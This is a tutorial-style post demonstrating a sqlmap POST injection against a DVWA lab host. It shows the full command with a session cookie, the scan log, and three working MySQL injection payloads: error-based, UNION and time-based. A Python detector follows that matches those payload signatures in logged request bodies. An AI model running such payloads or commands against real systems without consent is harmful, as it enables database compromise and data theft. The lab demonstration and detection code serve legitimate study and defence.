The simplest case is GET injection. Many people who have just started using sqlmap don't know how to run a POST injection, so here is a quick demonstration: pass the POST body with --data and the session cookie with --cookie.
F:\Pentest\software\测试软件\sqlmap>python sqlmap.py -u "http://192.168.1.204/dvwa/vulnerabilities/sqli/index.php?Submit=Submit#" --data "id=1" --cookie "security=low; PHPSESSID=2ct43q8u003g4fjm1o6jrjmbc7"
'svn' 不是内部或外部命令,也不是可运行的程序
或批处理文件。
sqlmap/1.0-dev (r4826) - automatic SQL injection and database takeover tool
http://www.sqlmap.org
[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 14:48:51
'stty' 不是内部或外部命令,也不是可运行的程序
或批处理文件。
[14:48:52] [INFO] using 'F:\Pentest\software\测试软件\sqlmap\output\192.168.1.204\session' as session file
[14:48:52] [INFO] testing connection to the target url
[14:48:52] [INFO] testing if the url is stable, wait a few seconds
[14:48:53] [INFO] url is stable
[14:48:53] [INFO] testing if POST parameter 'id' is dynamic
[14:48:53] [WARNING] POST parameter 'id' appears to be not dynamic
[14:48:53] [INFO] heuristics detected web page charset 'ascii'
[14:48:53] [INFO] heuristic test shows that POST parameter 'id' might be injectable (possible DBMS: MySQL)
[14:48:53] [INFO] testing sql injection on POST parameter 'id'
[14:48:53] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[14:48:54] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[14:48:54] [INFO] POST parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' injectable
[14:48:54] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[14:48:55] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[14:49:05] [INFO] POST parameter 'id' is 'MySQL > 5.0.11 AND time-based blind' injectable
[14:49:05] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[14:49:05] [INFO] target url appears to be UNION injectable with 2 columns
[14:49:05] [INFO] POST parameter 'id' is 'MySQL UNION query (NULL) - 1 to 10 columns' injectable
POST parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection points with a total of 31 HTTP(s) requests:
---
Place: POST
Parameter: id
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=1' AND (SELECT 2782 FROM(SELECT COUNT(*),CONCAT(0x3a7a727a3a,(SELECT (CASE WHEN (2782=2782) THEN 1 ELSE 0 END)),0x3a7877753a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'KQLu'='KQLu
Type: UNION query
Title: MySQL UNION query (NULL) - 2 columns
Payload: id=1' UNION ALL SELECT NULL, CONCAT(0x3a7a727a3a,0x4f584c50796c6c55696e,0x3a7877753a)# AND 'nemX'='nemX
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=1' AND SLEEP(5) AND 'tLql'='tLql
---
[14:49:09] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.3.5, Apache 2.2.17
back-end DBMS: MySQL 5.0
[14:49:09] [INFO] Fetched data logged to text files under 'F:\Pentest\software\测试软件\sqlmap\output\192.168.1.204'
[*] shutting down at 14:49:09
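The scan above ends with three payloads sqlmap reported as working against the POST parameter 'id' (error-based, UNION and time-based). From the defender's side, those same payloads are what you want to recognise in logged request bodies. The following is an added example, not part of the original post or of sqlmap: it assumes POST bodies are available to you (for instance from a WAF or application-level request log, since a plain Apache access log does not record them), classifies each parameter value by injection technique, and decodes the MySQL 0x... hex literals that sqlmap wraps around extracted data. The sample requests are constructed here from the payloads shown in the scan output plus one benign request.

```python
"""Added example (not from the original post): flag sqlmap-style SQL injection
payloads in logged POST bodies and decode the hex marker strings they carry."""
import re
from urllib.parse import parse_qs

# Constructed sample: one benign DVWA request plus the three payloads from the scan log.
# Bodies are shown URL-decoded for readability; parse_qs also accepts encoded ones.
SAMPLE_REQUESTS = [
    "id=1&Submit=Submit",
    "id=1' AND (SELECT 2782 FROM(SELECT COUNT(*),CONCAT(0x3a7a727a3a,(SELECT (CASE WHEN "
    "(2782=2782) THEN 1 ELSE 0 END)),0x3a7877753a,FLOOR(RAND(0)*2))x FROM "
    "INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'KQLu'='KQLu&Submit=Submit",
    "id=1' UNION ALL SELECT NULL, CONCAT(0x3a7a727a3a,0x4f584c50796c6c55696e,0x3a7877753a)"
    "# AND 'nemX'='nemX&Submit=Submit",
    "id=1' AND SLEEP(5) AND 'tLql'='tLql&Submit=Submit",
]

# Technique signatures, in the order findings are reported.
SIGNATURES = {
    # Delay functions used for time-based blind injection.
    "time-based": re.compile(r"\b(SLEEP|BENCHMARK)\s*\(", re.I),
    # UNION ... SELECT used to append attacker-chosen columns to the result set.
    "union": re.compile(r"\bUNION\b.*?\bSELECT\b", re.I | re.S),
    # FLOOR(RAND(0)*2) ... GROUP BY: the duplicate-key trick behind MySQL error-based extraction.
    "error-based": re.compile(r"FLOOR\s*\(\s*RAND\s*\(.*?\bGROUP\s+BY\b", re.I | re.S),
    # Trailing AND 'x'='x used to re-balance the quote the payload opened.
    "quote-balance": re.compile(r"\b(AND|OR)\s*'[^']*'\s*=\s*'", re.I),
}

HEX_LITERAL = re.compile(r"\b0x([0-9a-fA-F]{2,})\b")


def decode_hex_literals(value):
    """Decode MySQL 0x... string literals in a parameter value.

    sqlmap emits its delimiter markers (e.g. 0x3a7a727a3a -> ':zrz:') this way so
    it can locate extracted data in the response; seeing them decoded makes the
    intent of a request obvious in a log review."""
    decoded = []
    for hexdigits in HEX_LITERAL.findall(value):
        if len(hexdigits) % 2:  # odd length cannot be a byte string
            continue
        decoded.append(bytes.fromhex(hexdigits).decode("ascii", errors="replace"))
    return decoded


def scan_body(body):
    """Return {parameter: [technique, ...]} for every parameter matching a signature."""
    findings = {}
    # parse_qs splits on '&' and on the first '=' only, so '2782=2782' inside a value is safe.
    for name, values in parse_qs(body, keep_blank_values=True).items():
        for value in values:
            hits = [tech for tech, rx in SIGNATURES.items() if rx.search(value)]
            if hits:
                findings.setdefault(name, []).extend(hits)
    return findings


def scan_requests(bodies):
    """Scan a sequence of POST bodies; yield (index, findings, decoded markers) for hits only."""
    results = []
    for index, body in enumerate(bodies):
        findings = scan_body(body)
        if findings:
            markers = []
            for values in parse_qs(body, keep_blank_values=True).values():
                for value in values:
                    markers.extend(decode_hex_literals(value))
            results.append((index, findings, markers))
    return results


if __name__ == "__main__":
    for index, findings, markers in scan_requests(SAMPLE_REQUESTS):
        print(f"request #{index}: {findings} markers={markers}")
```

Run it and the three injected requests are reported with their technique while the benign `id=1` request is silent. The "quote-balance" signature is deliberately separate: on its own it is a weak indicator, but paired with any of the other three it is a strong sign of an automated tool rather than a hand-typed apostrophe.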